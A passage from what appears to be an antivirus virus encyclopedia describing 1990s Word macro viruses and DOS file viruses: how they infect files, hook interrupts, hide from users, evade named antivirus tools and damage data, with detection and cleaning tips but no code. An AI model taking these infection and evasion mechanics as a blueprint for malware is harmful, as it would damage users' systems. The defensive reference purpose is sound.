  8701. they are saved (FileSaveAs).
  8702.  
  8703. Word.Armadillo uses ToolsMacro to make recognition of an infected
  8704. document more difficult (called macro stealth technique).
  8705. If a user selects ToolsMacro, Armadillo adds the following text 10,000
  8706. times to the active document:
  8707.  
  8708. "   Armadillon Macro?   "
  8709.  
  8710. When a user starts Microsoft Word on a Tuesday and the global template
  8711. is infected, Armadillo displays the following message:
  8712.  
  8713. "   Liven up Monday with an Armadillon!   "
  8714.  
  8715. [Word_Cult.A]
  8716.  
  8717. Virus Name: Word.Cult.A
  8718. Virus Type: Word Macro Virus
  8719. Alias: None
  8720. Platform: Word 6/7
  8721. Number_of_macros: 1
  8722. Encrypted: No
  8723. Size_of_macros: 1688 Bytes
  8724. Place_of_origin: Germany
  8725. Date_of_origin: Summer 1997
  8726. Destructive: No
  8727. Trigger_date: None
  8728. Password: None
  8729. Seen_In_The_Wild: No
  8730. Seen_where:
  8731.  
  8732. DESCRIPTION:
  8733.  
  8734. Word.Cult.A is another intended macro virus. Due to bugs in the code
  8735. it does not infect other files.
  8736.  
  8737. The following comment can be found inside the code:
  8738.  
  8739. "   CULT! Nightmare Joker (SLAM)   "
  8740.  
  8741.  
  8742. [Word_CVCK1.A]
  8743.  
  8744. Virus Name: Word.CVCK1.A
  8745. Virus Type: Word Macro Virus
  8746. Alias: Chicken-Pox 0.1
  8747. Platform: Word 6/7
  8748. Number_of_macros: 11
  8749. Encrypted: Yes
  8750. Size_of_macros: 7315 Bytes
  8751. Place_of_origin: Indonesia
  8752. Date_of_origin: 1997
  8753. Destructive: No
  8754. Trigger_date: None
  8755. Password: None
  8756. Seen_In_The_Wild: No
  8757. Seen_where:
  8758.  
  8759. DESCRIPTION:
  8760.  
  8761. Word.CVCK1.A infects the global template when an infected document is
  8762. closed. Further documents become infected when they are also
  8763. closed (AutoClose).
  8764.  
  8765. Word.CVCK1.A uses ToolsMacro, ToolsCustomize and FileTemplates to make
  8766. recognition of an infected document more difficult (called macro
  8767. stealth technique).
  8768. When a user selects one of the options, Word.CVCK1.A displays the
  8769. following:
  8770.  
  8771. "   Chicken say .........   "
  8772.  
  8773. an empty picture and
  8774.  
  8775. "   [pox-poX-pOX-POX-POx-Pox-pox]   "", .Push2
  8776.  
  8777. The following comments can be found within the code:
  8778.  
  8779. "   --------------------------------------------   "
  8780. "   Created using CVCK v.01 b                      "
  8781. "   (C)CrazybitS 1997, Yogyakarta, Indonesia       "
  8782. "   --------------------------------------------   "
  8783.  
  8784. and
  8785.  
  8786. "   Sorry ... i'm defeat you !   "
  8787.  
  8788.  
  8789.  
  8790. [Word_CVCK1.B]
  8791.  
  8792. Virus Name: Word.CVCK1.B
  8793. Virus Type:  Word Macro Virus
  8794. Alias: Foxz
  8795. Platform: Word 6/7
  8796. Number_of_macros: 10
  8797. Encrypted: Yes
  8798. Size_of_macros: 5551 Bytes
  8799. Place_of_origin: Indonesia
  8800. Date_of_origin: 1997
  8801. Payload: Yes
  8802. Trigger_date: None
  8803. Password: None
  8804. Seen_In_The_Wild: No
  8805. Seen_where:
  8806.  
  8807. DESCRIPTION:
  8808.  
  8809. Word.CVCK1.B infects the global template when an infected document is
  8810. opened. Further documents become infected when they are
  8811. closed (AutoClose).
  8812.  
  8813. Word.CVCK1.B uses ToolsMacro and FileTemplates to make recognition of
  8814. an infected document more difficult (called macro stealth technique).
  8815. When a user selects one of the options, Word.CVCK1.B displays the
  8816. following:
  8817.  
  8818. "    Err = 0   "
  8819.  
  8820. Another message is displayed on the 1st and 13th of each month.
  8821.  
  8822. Word.CVCK1.B also tries to disable printing on Sundays.
  8823.  
  8824. The following comments can be found within the code:
  8825.  
  8826. "   Foxz members of NoMercy   "
  8827. "   thank's for decrypt this virus   "
  8828. "   you may learn the effect Or somthing Else  "
  8829. "   bye,"."".""."   "
  8830. "   Foxz   "
  8831. "   If you found bug please contact me at   "
  8832. "   idban"@" hotmail.com   "
  8833.  
  8834. and
  8835.  
  8836. "   Foxz Techno         "
  8837. "   Member Of NoMercy   "
  8838.  
  8839.  
  8840. [Word_CVCK1.C]
  8841.  
  8842. Virus Name: Word.CVCK1.C
  8843. Virus Type:  Word Macro Virus
  8844. Alias: Vampire, 80e
  8845. Platform: Word 6/7
  8846. Number_of_macros: 6 or 9 (global template)
  8847. Encrypted: Yes
  8848. Size_of_macros: 3158 (5759) Bytes
  8849. Place_of_origin: Indonesia
  8850. Date_of_origin: 1997
  8851. Destructive: Yes
  8852. Trigger_date: Fridays
  8853. Password: None
  8854. Seen_In_The_Wild: No
  8855. Seen_where:
  8856.  
  8857. DESCRIPTION:
  8858.  
  8859. Word.CVCK1.C infects the global template when an infected document is
  8860. opened. Further documents become infected when they are closed
  8861. (AutoClose).
  8862.  
  8863. Word.CVCK1.C uses ToolsMacro, ToolCustomize and FileTemplates to make
  8864. recognition of an infected document more difficult (called macro
  8865. stealth technique).
  8866.  
  8867. When a user selects one of the options, Word.CVCK1.C deletes all WIN.*
  8868. files in the Windows directory and displays the following message:
  8869.  
  8870. "   No risk, No Pain   "
  8871.  
  8872. Another payload triggers on Fridays when Word.CVCK1.C erases all text
  8873. from documents.
  8874.  
  8875. The following comments can be found within the code of Word.CVCK1.C:
  8876.  
  8877. "   Created using CVCK v.01 b   "
  8878. "   (C)CrazybitS 1997, Yogyakarta, Indonesia   "
  8879. "   Name : WM.80e aliase Vampire   "
  8880.  
  8881.  
  8882. [Word_CVCK1.D]
  8883.  
  8884. Virus Name: Word.CVCK1.D
  8885. Virus Type: Word Macro Virus
  8886. Alias: Vampire, 80e
  8887. Platform: Word 6/7
  8888. Number_of_macros: 6 or 9 (global template)
  8889. Encrypted: Yes
  8890. Size_of_macros: 3912 (5547) Bytes
  8891. Place_of_origin: Indonesia
  8892. Date_of_origin: 1997
  8893. Payload: Yes
  8894. Trigger_date: 13th of each month
  8895. Password: None
  8896. Seen_In_The_Wild: No
  8897. Seen_where:
  8898.  
  8899. DESCRIPTION:
  8900.  
  8901. Word.CVCK1.D infects the global template when an infected document is
  8902. opened. Further documents become infected when they are closed
  8903. (AutoClose).
  8904.  
  8905. Word.CVCK1.D uses ToolsMacro, ToolCustomize and FileTemplates to make
  8906. recognition of an infected document more difficult (called macro
  8907. stealth technique).
  8908.  
  8909. When a user selects one of the options, Word.CVCK1.D displays the
  8910. following message: (also displayed on the 13th of each month)
  8911.  
  8912. "   Visit NoMercy WEB PAGE !   "
  8913. "   Welcome Again buddy!   "
  8914. "   It's nice create a Virus, why you don't try?   "
  8915.  
  8916. The following comments can be found within the code of Word.CVCK1.D:
  8917.  
  8918. "   --------------------------------------------   "
  8919. "   Created using CVCK v.01 b   "
  8920. "   (C)CrazybitS 1997, Yogyakarta, Indonesia   "
  8921. "   --------------------------------------------   "
  8922. "   greeting to   "
  8923. "   -Cicatrix major collector   "
  8924. "   -D.Giovanni   "
  8925. "   -All Macro virii creator   "
  8926. "   -You that has seen the decription macro   "
  8927.  
  8928. and
  8929.  
  8930. "   Sorry ... i'm defeat you !   "
  8931.  
  8932.  
  8933. [Word_CVCK1.E]
  8934.  
  8935. Virus Name: Word.CVCK1.E
  8936. Virus type: Word Macro Virus
  8937. Alias: None
  8938. Platform: Word 6/7
  8939. Number_of_macros: 10
  8940. Encrypted: Yes
  8941. Size_of_macros: 5527 Bytes
  8942. Place_of_origin: Indonesia
  8943. Date_of_origin: 1997
  8944. Payload: Yes
  8945. Trigger_date: Sundays
  8946. Password: None
  8947. Seen_In_The_Wild: No
  8948. Seen_where:
  8949.  
  8950. DESCRIPTION:
  8951.  
  8952. The main difference between this new variant and the previous
  8953. Word.CVCK1.B viruses is that the Action, Actiondate, and AutoOpen
  8954. macros were modified.
  8955.  
  8956. Word.CVCK1.E infects the global template when an infected document is
  8957. opened. Further documents become infected when they are closed
  8958. (AutoClose).
  8959.  
  8960. Word.CVCK1.E uses ToolsMacro and FileTemplates to make recognition of
  8961. an infected document more difficult (called macro stealth technique).
  8962.  
  8963. Word.CVCK1.E also tries to disable printing on Sundays.
  8964.  
  8965. The following comment can be found within the code of Word.CVCK1.E:
  8966.  
  8967. "   --------------------------------------------   "
  8968. "   Hey you.....   "
  8969. "   This again from NoMercy...   "
  8970. "   created by Fox`z    "
  8971. "   --------------------------------------------   "
  8972.  
  8973.  
  8974. [Word_CVCK1.F]
  8975.  
  8976. Virus Name: Word.CVCK1.F
  8977. Virus type: Word Macro Virus
  8978. Alias: Billy Mahone
  8979. Platform: Word 6/7
  8980. Number_of_macros: 6 or 9 (global template)
  8981. Encrypted: Yes
  8982. Size_of_macros: 2209 or 2338 Bytes
  8983. Place_of_origin: Unknown
  8984. Date_of_origin: 1997
  8985. Payload: Yes
  8986. Trigger_date: 13th of each month
  8987. Password: None
  8988. Seen_In_The_Wild: No
  8989. Seen_where:
  8990.  
  8991. DESCRIPTION:
  8992.  
  8993. Word.CVCK1.F seems to be the first macro virus, created with the
  8994. CVCK1 virus generator, that was not modified after its creation.
  8995.  
  8996. Word.CVCK1.F infects the global template when an infected document
  8997. is opened. Further documents become infected when they are closed
  8998. (AutoClose).
  8999.  
  9000. Word.CVCK1.F uses ToolsMacro, ToolsCustomize and FileTemplates to make
  9001. recognition of an infected document more difficult (called macro
  9002. stealth technique).
  9003.  
  9004. When Word.CVCK1.F triggers (on the 13th of each month), it displays
  9005. the following message:
  9006.  
  9007. "   Billy Mahone is back!!!   "
  9008.  
  9009. (More obscure than the virus itself is the name of the virus author,
  9010. which is a character in the movie " Flatliners ").
  9011.  
  9012. The following comment can be found within the code of Word.CVCK1.G:
  9013.  
  9014. "   Sorry ... i'm defeat you !   "
  9015.  
  9016. and
  9017.  
  9018. "   Just bypass Nothing to do!   "
  9019.  
  9020.  
  9021. [Word_CVCK1.G]
  9022.  
  9023. Virus Name: Word.CVCK1.G
  9024. Virus Type: Word Macro Virus
  9025. Alias: None
  9026. Platform: Word 6/7
  9027. Number_of_macros: 5
  9028. Encrypted: Yes
  9029. Size_of_macros: 2029 Bytes
  9030. Place_of_origin: Unknown
  9031. Date_of_origin: 1997
  9032. Payload: Yes
  9033. Trigger_date: 13th of each month
  9034. Password: None
  9035. Seen_In_The_Wild: No
  9036. Seen_where:
  9037.  
  9038. DESCRIPTION:
  9039.  
  9040. Word.CVCK1.G seems to be another creation of the author
  9041. of Word.CVCK1.F. It contains another reference to the movie
  9042. "Flatliners."
  9043.  
  9044. Word.CVCK1.G infects the global template when an infected document is
  9045. opened. Further documents become infected when they are closed
  9046. (AutoClose).
  9047.  
  9048. When Word.CVCK1.G triggers (on the 13th of each month), it displays the
  9049. following message:
  9050.  
  9051. "   Put me in the sate of death   "
  9052.  
  9053. The following comment can be found within the code of Word.CVCK1.G:
  9054.  
  9055. "   Sorry ... i'm defeat you !   "
  9056.  
  9057. and
  9058.  
  9059. "   Just bypass Nothing to do!   "
  9060.  
  9061.  
  9062. [Word_CVCK1.H]
  9063.  
  9064. Virus Name: Word.CVCK1.H
  9065. Virus Type: Word Macro Virus
  9066. Alias: None
  9067. Platform: Word 6/7
  9068. Number_of_macros: 5
  9069. Encrypted: Yes
  9070. Size_of_macros: 2031 Bytes
  9071. Place_of_origin: Unknown
  9072. Date_of_origin: 1997
  9073. Payload: Yes
  9074. Trigger_date: 13th of each month
  9075. Password: None
  9076. Seen_In_The_Wild: No
  9077. Seen_where:
  9078.  
  9079. DESCRIPTION:
  9080.  
  9081. Word.CVCK1.H seems to be another creation of the author
  9082. of Word.CVCK1.F and Word.CVCK1.G! It contains another reference to
  9083. the movie "Flatliners."
  9084.  
  9085. Word.CVCK1.H infects the global template when an infected document is
  9086. opened. Further documents become infected when they are closed
  9087. (AutoClose).
  9088.  
  9089. When Word.CVCK1.H triggers (on the 13th of each month), it displays
  9090. the following message:
  9091.  
  9092. "   Today is a good day to die!!!   "
  9093.  
  9094. The following comment can be found within the code of Word.CVCK1.H:
  9095.  
  9096. "   Sorry ... i'm defeat you !   "
  9097.  
  9098. and
  9099.  
  9100. "   Just bypass Nothing to do!   "
  9101.  
  9102.  
  9103. [Word_CVCK1.I]
  9104.  
  9105. Virus Name: Word.CVCK1.I
  9106. Virus Type: Word Macro Virus
  9107. Alias: None
  9108. Platform: Word 6/7
  9109. Number_of_macros: 11
  9110. Encrypted: Yes
  9111. Size_of_macros: 7329 Bytes
  9112. Place_of_origin: Unknown
  9113. Date_of_origin: 1997
  9114. Payload: Yes
  9115. Trigger_date: 11th and 31st of each month
  9116. Password: None
  9117. Seen_In_The_Wild: No
  9118. Seen_where:
  9119.  
  9120. DESCRIPTION:
  9121.  
  9122. The main difference between this new variant and the previous
  9123. Word.CVCK1.A virus is that the code has been slightly modified.
  9124.  
  9125. For more information, please refer to the Word.CVCK1.A virus
  9126. description.
  9127.  
  9128.  
  9129. [Word_Czech.A]
  9130.  
  9131. Virus Name: Word.Czech.A
  9132. Virus Type: Word Macro Virus
  9133. Alias: None
  9134. Platform: Word 6/7
  9135. Number_of_macros: 2
  9136. Encrypted: Yes
  9137. Size_of_macros: 424 Bytes
  9138. Place_of_origin: Unknown
  9139. Date_of_origin: Spring 1997
  9140. Payload: None
  9141. Trigger_date: None
  9142. Password: None
  9143. Seen_In_The_Wild: No
  9144. Seen_where:
  9145.  
  9146. DESCRIPTION:
  9147.  
  9148. Word.Czech.A infects the global template when an infected document
  9149. is opened. Further documents become infected when they are also
  9150. opened and saved (FileSave).
  9151.  
  9152. Word.Czech.A is another do-nothing macro virus, being only infectious.
  9153.  
  9154. [Version]
  9155. Virus Name: Version
  9156. Virus Type: Memory resident, File Virus (COM files)
  9157. Virus Length:  708 bytes
  9158.  
  9159. PC Vector Hooked: INT 21h
  9160.  
  9161. Execution Procedure:
  9162. 1) It decodes its first three bytes.
  9163. 2) Checks whether or not it is memory resident. If it is,
  9164.    goes back to the original routine directly. Otherwise, it loads
  9165.    itself resident in the high memory, then hooks INT 21h and goes
  9166.    back to the original routine.
  9167.  
  9168. Infection Procedure:
  9169. 1) Hooks INT 21h (AH=30h) to display an incorrect DOS version.
  9170. 2) Hooks INT 21h (AX=4203h) to verify whether or not the memory has
  9171.    been infected (returns AX=6969h).
  9172. 3) Hooks INT 21h(AX=4B00h)to infect COM files.
  9173.  
  9174. Damage: The call for retrieving the DOS version does not run correctly.
  9175.  
  9176. Note: This virus does not run correctly due to errors in its codes.
  9177.  
  9178. Detection method:
  9179. 1) Date and time fields of infected files are changed.
  9180. 2) Infected files increase by 705 bytes.
  9181.  
  9182. [Versikee-1326]
  9183. Virus Name: Versikee-1326
  9184. Virus Type: File Virus (EXE files)
  9185. Virus Length:  1326 bytes
  9186.  
  9187. Execution Procedure: Searches for an uninfected EXE file and
  9188. infects it (it only infects one file at a time). The searching
  9189. path is from the current directory to its subdirectory, to
  9190. subdirectories under the last subdirectory, to root directory, to
  9191. subdirectories under the root directory. If there is an infectable
  9192. file, it checks the system time. If the Seconds value is a multiple
  9193. of 8, the virus destroys the first five bytes of the file. Otherwise,
  9194. the virus just infects it. It then goes back to the original routine.
  9195.  
  9196. Damage: Destroys the first five bytes of a file depending on the value
  9197. of the Seconds field.
  9198.  
  9199. Note: Date and time fields of infected files are not changed.
  9200.  
  9201. Detection method: Length of infected files increase. The
  9202. algorithm is: first it adds the original length to make it a
  9203. multiple of 16, and then increases its length by 1326 bytes.
  9204.  
  9205. [163]
  9206. Virus Name: 163
  9207. Virus Type: File Virus (COM files)
  9208. Virus Length:  163 bytes
  9209.  
  9210. Execution Procedure:
  9211. 1) Infects uninfected COM files on the current directory. If there
  9212.    are no COM files on the current directory or at least one file is
  9213.    already infected, the virus goes back to the original routine.
  9214.  
  9215. Infection Procedure:
  9216. (1) Moves the first 163 bytes of the original file at the end.
  9217. (2) Writes the virus code onto the first 163 bytes. The file gets
  9218.     corrupted if it is less than 163 bytes.
  9219.  
  9220. Damage: None
  9221.  
  9222. Note:
  9223. 1) Does not infect the same file.
  9224. 2) Date and time fields of infected files are not changed.
  9225.  
  9226. Detection method:
  9227. 1) Infected files increase by 163 bytes.
  9228. 2) Check for "*.COM" starting from the 19Dh byte of the file.
  9229.  
  9230. [Vengence-A]
  9231. Virus Name: Vengence-A
  9232. Other Name: Vengence-194
  9233. Virus Type: File Virus (*.C* files)
  9234. Virus Length:  194 bytes
  9235.  
  9236. Execution Procedure: It infects all *.C* files on the current
  9237. directory.
  9238.  
  9239. Infection Procedure: Overwrites the first 194 bytes of the file
  9240. with the virus code. If the original file is less than 194 bytes,
  9241. the file will be 194 bytes after infection; otherwise, the length
  9242. would not change.
  9243.  
  9244. Damage: It overwrites the first 194 bytes of the original file with
  9245. the virus code, thus corrupting the file.
  9246.  
  9247. Detection method:
  9248. 1) Date and time fields of infected files are changed.
  9249. 2) The following text can be found at the end of infected files:
  9250.  
  9251.     "Vengence-A virus. Lastest release from Swedish Virus
  9252.      Association. Released 7th of May 1992. Happy hacking and
  9253.      greetings to all Virus writers..."
  9254.  
  9255. [Vengence-B]
  9256. Virus Name: Vengence-B
  9257. Other Name: Vengence-252
  9258. Virus Type: File Virus (*.C*, mainly COM files)
  9259. Virus Length:  252 bytes
  9260.  
  9261. Execution Procedure: It infects *.C* files on the current
  9262. directory.
  9263.  
  9264. Infection Procedure: Overwrites the first 252 bytes of the file
  9265. with the virus code. If the original file is less than 252 bytes,
  9266. the file will be 252 bytes after infection; otherwise, the length
  9267. would not change.
  9268.  
  9269. Damage: It overwrites the first 252 bytes of the original file thus
  9270. corrupting the file.
  9271.  
  9272. Note: Date and time fields of infected files are not changed.
  9273.  
  9274. Detection method:
  9275. The following text can be found at the end of infected files:
  9276.  
  9277.     "Vengence-B virus. Lastest release from Swedish Virus
  9278.      Association. Released 8th of May 1992. Satan will come and
  9279.      rule his world and his people!"
  9280.  
  9281. [Vengence-C]
  9282. Virus Name: Vengence-C
  9283. Other Name: Vengence-390
  9284. Virus Type: File Virus (*.C*, mainly COM files)
  9285. Virus Length:  390 bytes
  9286.  
  9287. Execution Procedure: It infects the first *.C* file on the
  9288. current directory.
  9289.  
  9290. Infection Procedure: Overwrites the first 390 bytes of the file
  9291. with the virus code. If the original file is less than 390 bytes,
  9292. the file will be 390 bytes after infection; otherwise, the length
  9293. would not change.
  9294.  
  9295. Damage: It overwrites the first 390 bytes of the original file thus
  9296. corrupting the file.
  9297.  
  9298. Note:
  9299. 1) Date and time fields of infected files are not changed.
  9300. 2) When the virus is executed, it checks first for any anti-virus
  9301.    software like F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte and
  9302.    TBSCANX. The virus stops executing if any of these programs exist.
  9303.  
  9304. Detection method:
  9305. The following text can be found at the end of infected files:
  9306.  
  9307.     "Vengence-C virus. Lastest release from Swedish Virus
  9308.      Association. Released 8th of May 1992. Satan will come and
  9309.      rule his world and his people!"
  9310.  
  9311. [Vengence-D]
  9312. Virus Name: Vengence-D
  9313. Other Name: Vengence-435
  9314. Virus Type: File Virus (*.C*, mainly COM files)
  9315. Virus Length:  435 bytes
  9316.  
  9317. Execution Procedure:
  9318. 1) Checks whether or not the current time is 12:00(AM). If it is,
  9319.    it displays the following message and then increases the system
  9320.    time by an hour.
  9321.  
  9322.     "Vengence-D virus. Lastest release from Swedish Virus
  9323.      Association. Released 8th of May 1992. Satan will come and
  9324.      rule his world and his people!"
  9325.  
  9326. 2) Infects the first *.C* file on the current directory.
  9327.  
  9328. Infection Procedure: Overwrites the first 435 bytes of the file
  9329. with the virus code. If the original file is less than 435 bytes,
  9330. the file will be 435 bytes after infection; otherwise, the length
  9331. would not change.
  9332.  
  9333. Damage: It overwrites the first 435 bytes of the original file thus
  9334. corrupting the file.
  9335.  
  9336. Note:
  9337. 1) Date and time fields of infected files are not changed.
  9338. 2) When the virus is executed, it checks first for any anti-virus
  9339.    software like F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte and
  9340.    TBSCANX. The virus stops executing if any of these programs exist.
  9341.  
  9342. Detection method: Check for the text mentioned above.
  9343.  
  9344. [Vengence-F]
  9345. Virus Name: Vengence-F
  9346. Other Name: Vengence-656
  9347. Virus Type: File Virus (*.C*, mainly COM files)
  9348. Virus Length:  656 bytes
  9349.  
  9350. Execution Procedure:
  9351. 1) Checks whether or not the current time is 12:00(AM). If it is,
  9352.    it displays the following message and then increases the system
  9353.    time by an hour.
  9354.  
  9355.     "Vengence-F virus. Debugging session unlimited."
  9356.  
  9357. 2) Infects the first *.C* file on the current, its father, its
  9358.    father's father directory, and so on.
  9359.  
  9360. Infection Procedure: Moves the first 656 bytes of the file at the
  9361. end and then writes the virus code onto the first 656 bytes. It then
  9362. attaches "SVC" at the end of the file.
  9363.  
  9364. Damage: Infected files cannot execute.
  9365.  
  9366. Note:
  9367. 1) Date and time fields of infected files are not changed.
  9368. 2) When the virus is executed, it checks:
  9369.    - whether it is being traced by Debug. If it is, it halts the system.
  9370.    - for anti-virus programs like F-LOCK, F-POPUP, F-FCHK, F-DLOCK,
  9371.      ThunderByte and TBSCANX. If any of these programs exist, the virus
  9372.      stops executing.
  9373.  
  9374. Detection method:
  9375. 1) Check for the text mentioned above.
  9376. 2) Check for the word "SVC" at the end of infected files.
  9377. 3) Infected files increase by 656 bytes.
  9378.  
  9379. Cleaning Method: Delete the first 656 bytes and "SVC" at the end of
  9380. infected files. If the file is larger than 656 bytes, move the last
  9381. 656 bytes up front.
  9382.  
  9383. [V500]
  9384. Virus Name: V500
  9385. Virus Type: Memory Resident(OS), File Virus (COM files)
  9386. Virus Length:  500 bytes
  9387.  
  9388. PC Vectors Hooked: INT 21H
  9389.  
  9390. Execution Procedure: The virus checks whether the DOS version is 3.3.
  9391. If not, it goes back to the original routine directly. Otherwise, it
  9392. stays resident in the memory (OS area).
  9393.  
  9394. While in the memory the virus calls INT 86h to infect COM files when
  9395. INT 00h-0Ch is called. It then goes back to the original routine. The
  9396. virus reinfects files.
  9397.  
  9398. Infection Procedure: The virus moves the first 500 bytes of the file
  9399. at the end, then writes the virus code on front.
  9400.  
  9401. Damage: None
  9402.  
  9403. Note: Date and time fields of infected files are not changed.
  9404.  
  9405. Detection method: Infected files increase by 500 bytes.
  9406.  
  9407. [Crazy-L15]
  9408. Virus Name: Crazy-I15
  9409. Virus Type: Memory Resident(HiMem), File Virus (COM files)
  9410. Virus Length: 1,402 bytes
  9411.  
  9412. PC vectors Hooked: Int 21h, INT 24h
  9413.  
  9414. Execution Procedure:
  9415. 1) Checks whether or not it resides in the memory. If not, it loads
  9416.    itself resident in the high memory.
  9417. 2) Hooks INT 21h.
  9418. 3) Goes back to the original routine.
  9419.  
  9420. Infection Procedure: Hooks INT 21H(AH=4Bh) to infect files. First, it
  9421. hangs INT 24h to prevent divulging its trace when writing,
  9422. then checks whether the program to be executed is an uninfected
  9423. COM file. If it is, the virus infects it. Lastly, it restores
  9424. INT 24h.
  9425.  
  9426. Damage: None
  9427.  
  9428. Detection method: Infected files increase by 1402 bytes.
  9429.  
  9430. [Variety]
  9431. Virus Name: Variety
  9432. Virus Type: File Virus (COM files)
  9433. Virus Length:  625 bytes
  9434.  
  9435. Execution Procedure:
  9436. 1) The virus decodes.
  9437. 2) Infects a COM file on the current directory (it only infects
  9438.    one file at a time).
  9439.  
  9440. Infection Procedure:
  9441. 1) It encodes the virus code.
  9442. 2) Attaches the viral code at the end of the original file.
  9443.  
  9444. Damage: None
  9445.  
  9446. Note:
  9447. 1) If the DOS version is not above 2.0, the virus will not infect
  9448.    files.
  9449. 2) Time and date fields of infected files are not changed.
  9450.  
  9451. Detection method: Infected files increase by 625 bytes.
  9452.  
  9453. [Infector]
  9454. Virus Name: Infector
  9455. Virus Type: File Virus (COM files)
  9456. Virus Length:  820-830 bytes
  9457.  
  9458. Execution Procedure:
  9459. Searches for an uninfected COM file on the current directory, and
  9460. then proceeds to infect it (it only infects one file at a time).
  9461.  
  9462. Damage: None
  9463.  
  9464. Note:
  9465. 1) Most infected files cannot be executed due to the poor quality
  9466.    of the virus procedure.
  9467. 2) Does not stay in the memory.
  9468. 3) You will see an error message when writing because INT 24h has
  9469.    not been hanged.
  9470.  
  9471. Detection method: Infected files increase by 820 to 830 bytes.
  9472.  
  9473. [Irish-3]
  9474. Virus Name: Irish-3
  9475. Virus Type: File Virus (COM files)
  9476. Virus Length:  1164 bytes
  9477.  
  9478. PC Vectors Hooked: INT 21h, INT 1Ch
  9479.  
  9480. Execution Procedure:
  9481. 1) Checks whether or not it is memory resident. If not, it loads
  9482.    itself resident in the high memory.
  9483. 2) Hooks INT 21h,INT 1Ch and goes back to the original routine.
  9484.  
  9485. Infection Procedure: Hooks INT 21H(AH=4Bh) to infect files. It
  9486. checks whether the program to be executed is an uninfected COM
  9487. file. If it is, the virus infects it. If it is an uninfected
  9488. EXE file, the virus creates a new COM file (with length between
  9489. 2000 and 4000 bytes) with the same file name as the original EXE file.
  9490. This new COM file contains the virus code.
  9491.  
  9492. Damage: None
  9493.  
  9494. Note:
  9495. 1) If the current date is November 21, it counts time by hooking INT
  9496.    08h. After a few minutes, it displays the following message:
  9497.  
  9498.    "Virus V2.0 (c) 1991 Necros The Hacher Written on 29,30
  9499.    June.................................. ...................."
  9500.  
  9501. 2) You will see an error message when writing because INT 24h has
  9502.    not been hanged.
  9503.  
  9504. Detection method: Infected files increase by 1164 bytes.
  9505.  
  9506. [101]
  9507. Virus Name: 101
  9508. Virus Type: File Virus
  9509. Virus Length: 2560 bytes
  9510.  
  9511. Execution Procedure: When all the files (COM and EXE) have been
  9512. infected in the current drive, the virus will check the system date
  9513. to determine whether it is a multiple of 9 (for example 9th, 18th,
  9514. 27th). If "yes," all the text on the screen will be confused and
  9515. down-shifted. If not the virus will modify the boot sector and continue
  9516. to infect another drive.
  9517.  
  9518. Damage: All the files (COM and EXE) will be infected and increased by
  9519. 2560 Bytes. Infected file contains the string "VIRUS 101".
  9520.  
  9521.  
  9522. [1339]
  9523. Virus Name: 1339
  9524. Other Names: Vacsina virus
  9525. Virus Type: Parasitic Virus
  9526. Virus Length: 1339 bytes
  9527.  
  9528. Symptoms: Increases infected .COM file sizes by 1339 bytes, .EXE files
  9529. by 1471 bytes. Infected files contain the word "VACSINA". Decreases the
  9530. size of free RAM memory.
  9531.  
  9532. Damage: No damage, no manipulation.
  9533.  
  9534. Note: First the virus tests to determine if it is already in memory
  9535. (it uses interrupt vector 31h for this purpose). If it is not in memory
  9536. yet, it installs itself before the infected program (using MCB
  9537. modification, it allocates 1344 bytes). After installation the virus
  9538. monitors DOS EXEC function and infects all uninfected programs. This
  9539. virus is one of a group of viruses which cooperates with each other.
  9540. This group has every virus of its own level, a virus can remove some
  9541. other Vacsina with lower level 10h. It can remove viruses with level
  9542. less than 10h. To spread, a Vacsina virus uses direct interrupt 21h.
  9543.  
  9544. [1701/1704]
  9545. Virus Name: 1701/1704
  9546. Other Names: Raindrop virus
  9547. Virus Type: Parasitic Virus
  9548. Virus Length: 1701/1704 bytes
  9549.  
  9550. Symptoms: Increases infected .COM file sizes by 1701/1704 bytes when
  9551. the system date is between October and December, 1988. Five minutes
  9552. after installation, virus will scan all the characters on screen
  9553. and down-shift one by one as if it were raining.
  9554.  
  9555. Damage: No damage. System will halt after virus is activated.
  9556.  
  9557.  
  9558. [2881]
  9559. Virus Name: 2881
  9560. Other Names: Yankee Doodle virus
  9561. Virus Type: Parasitic Virus
  9562. Virus Length: 2881 bytes
  9563.  
  9564. Symptoms: Increases infected file size by approximately 2881 bytes and
  9565. decreases the size of free RAM memory. Infected .COM files display
  9566. 7A4Fh and 2Ch as their end words (flagf for other viruses, for example:
  9567. for Vacsina virus). Virus will play "Yankee Doodle" when some
  9568. conditions are met (see damage).
  9569.  
  9570. Damage: Ping-Pong virus modification: it modifies the Ping-Pong virus
  9571. in memory. It changes two bytes, one jump and adds one subroutine. It
  9572. is very interesting that Ping-Pong virus is ready for this change.
  9573. After this reboot (it writes this count to all disks) and after 255
  9574. reboots, the Ping-Pong virus immediately deactivates into the memory
  9575. (it returns original interrupt vector 13h and the value of 0:413h).
  9576. Subsequently, "Yankee Doodle" is played.
  9577.  
  9578. [2928]
  9579. Virus Name: 2928
  9580. Other Names: Yankee Doodle virus
  9581. Virus Type: Parasitic Virus
  9582. Virus Length: 2928 bytes
  9583.  
  9584. Symptoms: Increases infected file size by approximately 2928 bytes and
  9585. decreases the size of free RAM memory. Infected .COM files display
  9586. 7A4Fh and 29h as their end words (flagf for other viruses, for example:
  9587. for Vacsina virus). Virus will play "Yankee Doodle" when some
  9588. conditions are met (see damage).
  9589.  
  9590. Damage: Ping-Pong virus modification: it modifies Ping-Pong virus in
  9591. memory. It changes two bytes, one jump and adds one subroutine.
  9592. (It's interesting that Ping-Pong virus is ready for this change.)
  9593. After this reboot (it writes this count to all disks), and after 255
  9594. reboots, the Ping-Pong virus immediately deactivates into memory (it
  9595. returns original interrupt vector 13h and the value of 0:413h).
  9596. Subsequently, "Yankee Doodle" is played.
  9597.  
  9598. Special features: It seems that this virus is an older version of the
  9599. 2881 virus. It is also one of a large virus group. With its level 29h
  9600. it is one of the previous releases of the same virus. It has the same
  9601. mechamism, causes the same damage (except that virus 2881 doesn't play
  9602. the melody every day, so it cannot be detected as early). The code of
  9603. virus 2881 is optimized, so the new version is shorter (about 47
  9604. bytes).
  9605.  
  9606. [3584]
  9607. Virus Name: 3584
  9608. Other Names: Fish 6
  9609. Virus Type: Parasitic Virus, Memory resident
  9610. Virus Length: 3584 bytes
  9611.  
  9612. Symptoms: Increases infected file size by 3584 bytes. Decreases the
  9613. size of free RAM memory by 6KB.
  9614.  
  9615. Damage: Virus displays the message "FISH VIRUS #6 - EACH DIFF BONN
  9616. 2/90 '~knzyvo}'" on the screen using function 9 of interrupt 21h and
  9617. halts the computer using instruction HLT.
  9618.  
  9619.  
